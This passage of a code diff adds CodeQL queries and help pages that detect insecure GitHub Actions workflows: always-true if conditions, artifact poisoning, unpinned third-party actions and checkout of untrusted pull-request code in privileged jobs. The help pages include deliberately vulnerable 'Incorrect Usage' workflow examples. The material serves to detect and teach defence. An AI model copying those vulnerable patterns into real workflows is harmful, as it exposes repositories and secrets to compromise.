Issue](https://github.com/actions/runner/issues/1173) diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql new file mode 100644 index 000000000000..6eaaca6e05db --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql @@ -0,0 +1,26 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @security-severity 9.0 + * @problem.severity error + * @precision very-high + * @id actions/if-expression-always-true/critical + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from ControlCheck i +where + i.(If).getCondition().matches("%${{%") and + ( + not i.(If).getCondition().matches("${{%") or + not i.(If).getCondition().matches("%}}") + ) + or + count(i.(If).getCondition().splitAt("${{")) > 2 +select i, "Expression always evaluates to true" diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md new file mode 100644 index 000000000000..1e7ea120cbaa --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md @@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql new file mode 100644 index 000000000000..6b0c69977612 --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql @@ -0,0 +1,29 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/if-expression-always-true/high + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from If i +where + not i instanceof ControlCheck and + ( + i.getCondition().matches("%${{%") and + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) + or + count(i.getCondition().splitAt("${{")) > 2 + ) +select i, "Expression always evaluates to true" diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md new file mode 100644 index 000000000000..9b1782d6ba84 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql new file mode 100644 index 000000000000..afef7bdd82b2 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -0,0 +1,28 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind path-problem + * @problem.severity error + * @precision very-high + * @security-severity 9 + * @id actions/artifact-poisoning/critical + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks + +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink, Event event +where + ArtifactPoisoningFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") + ) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().toString(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md new file mode 100644 index 000000000000..9b1782d6ba84 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql new file mode 100644 index 000000000000..992b2aa8c5d4 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -0,0 +1,25 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind path-problem + * @problem.severity warning + * @precision high + * @security-severity 5.0 + * @id actions/artifact-poisoning/medium + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks + +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +where + ArtifactPoisoningFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql new file mode 100644 index 000000000000..519437ddb229 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -0,0 +1,44 @@ +/** + * @name Artifact Poisoning (Path Traversal). + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity error + * @precision very-high + * @security-severity 9 + * @id actions/artifact-poisoning/path-traversal + * @tags actions + * security + * experimental + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UseOfKnownVulnerableActionQuery + +from UsesStep download, KnownVulnerableAction vulnerable_action, Event event +where + event = download.getATriggerEvent() and + vulnerable_action.getVulnerableAction() = download.getCallee() and + download.getCallee() = "actions/download-artifact" and + ( + download.getVersion() = vulnerable_action.getVulnerableVersion() or + download.getVersion() = vulnerable_action.getVulnerableSha() + ) and + ( + // exists a poisonable upload artifact in the same workflow + exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + download.getEnclosingJob().isPrivilegedExternallyTriggerable(event) and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = poison and + poison.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + or + // upload artifact is not used in the same workflow + not exists(UsesStep upload | + download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload + ) + ) +select download, "Potential artifact poisoning" diff --git a/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md new file mode 100644 index 000000000000..d7c114f0404e --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use a non-immutable action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql new file mode 100644 index 000000000000..de8d3c2078a8 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -0,0 +1,40 @@ +/** + * @name Unpinned tag for a non-immutable Action in workflow + * @description Using a tag for a non-immutable Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/unpinned-tag + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UseOfUnversionedImmutableAction + +bindingset[version] +private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + repo.matches(["actions", "github", "advanced-security"] + "/%") +} + +from UsesStep uses, string repo, string version, Workflow workflow, string name +where + uses.getCallee() = repo and + uses.getEnclosingWorkflow() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) and + not isImmutableAction(uses, repo) +select uses.getCalleeNode(), + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md new file mode 100644 index 000000000000..71ba2032a9d0 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checked-out Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql new file mode 100644 index 000000000000..c1d3729701d1 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -0,0 +1,55 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Privileged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind path-problem + * @problem.severity error + * @precision very-high + * @security-severity 9.3 + * @id actions/untrusted-checkout/critical + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from PRHeadCheckoutStep checkout, PoisonableStep poisonable, Event event +where + // the checkout is followed by a known poisonable step + checkout.getAFollowingStep() = poisonable and + ( + poisonable instanceof Run and + ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), checkout.getPath()) + or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath()) + ) + or + poisonable instanceof UsesStep and + ( + not poisonable instanceof LocalActionUsesStep and + checkout.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath()) + ) + ) and + // the checkout occurs in a privileged context + inPrivilegedContext(poisonable, event) and + inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) +select poisonable, checkout, poisonable, + "Potential execution of untrusted code on a privileged workflow ($@)", event, event.getName() diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md new file mode 100644 index 000000000000..71ba2032a9d0 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checked-out Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql new file mode 100644 index 000000000000..98b9aee33f77 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -0,0 +1,46 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Privileged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/untrusted-checkout/high + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +from PRHeadCheckoutStep checkout, Event event +where + // the checkout is NOT followed by a known poisonable step + not checkout.getAFollowingStep() instanceof PoisonableStep and + // the checkout occurs in a privileged context + inPrivilegedContext(checkout, event) and + event.getName() = checkoutTriggers() and + ( + // issue_comment: check for date comparison checks and actor/access control checks + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) + ) + or + // not issue_comment triggered workflows + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + ) +select checkout, "Potential execution of untrusted code on a privileged workflow ($@)", event, + event.getName() diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md new file mode 100644 index 000000000000..71ba2032a9d0 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checked-out Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql new file mode 100644 index 000000000000..66c68e882e22 --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -0,0 +1,23 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Privileged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.0 + * @id actions/untrusted-checkout/medium + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery + +from PRHeadCheckoutStep checkout +where + // the checkout occurs in a non-privileged context + inNonPrivilegedContext(checkout) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md 